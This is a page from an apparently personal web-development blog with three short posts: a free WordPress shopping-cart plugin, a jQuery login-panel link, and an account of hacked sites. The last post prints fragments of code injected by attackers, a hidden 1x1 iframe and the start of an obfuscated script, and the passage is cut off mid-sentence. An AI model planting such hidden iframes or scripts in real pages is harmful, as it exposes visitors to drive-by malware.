Shoultes.net » HTML

WP-Ejunkie Shopping Cart Plugin

Seth — Wed, 21 Jul 2010 04:40:57 +0000

WP-Junkie Shoping Cart Example

Tired of adding lots of HTML button code to WordPress posts and pages?

Introducing WP E-Junkie, a quick and easy to use solution for selling product downloads using the WP E-Junkie Shopping Cart system and WordPress. All you need is an E-Junkie account, your E-junkie client id and a self hosted WordPress website.

Buttons are easily added to a post/page by pasting a small shortcode containing the product id any of your products hosted on E-Junkie.com.

The plugin is totally free and custom buttons can even be added via the plugin settings page!

Check out the new WP E-Junkie Shopping Cart, view screen shots, or see the plugin in action.

An easy way to create login panel with jQuery and CSS

Seth — Wed, 10 Feb 2010 06:53:21 +0000

Creating Login Panel with jQuery and CSS

Mohit Aneja over at CSS Jockey has created a pretty nice looking sliding login panel using Jquery and CSS. The sliding login panel is similiar to what can be seen on Twitter and few other popular websites. The script looks pretty lightweight, easy to use and is well documented. I may be using it soon (when I get around to re-designing this site.)

Check it out the full article here:

http://www.cssjockey.com/coding/jquery-css-login-panel

WordPress/Website Security Exploits

Seth — Sat, 02 Jan 2010 03:28:16 +0000

I have recently seen several websites that I maintain, as well as several that I don’t maintain, hacked by some kind of bot net. It has been a really good learning experience to say the least.

Most of the hacked websites were running WordPress, so my first thought that it was some kind of security exploit in WordPress. Then I was asked to investigate of a few static HTML or PHP driven websites without WordPress installations. All of the hacks were very similar and had their index.php, index.html, and .htaccess files modified. In the index.php and index.html files there was javascript code and iframe virus codes appended to the end of the file that would try to install different variants of badware/malware to unsuspecting visitors. I even seen a file that had stripped out part of the code within the file and replaced it with the malicious javascript and iframe virus browser exploits. Therefore completely breaking the file (luckily we had a backup of the now broken file and were able to to get the site working again.)

The funny thing is that some of the these exploits were done sloppily and actually exposed the malicious code that was appended to the end of the file. The malicious code had been placed at the end of the file right after the tag.

Here is how the code looked:

iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>

script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){... (which would then show all of the html in the hack)

Instead of: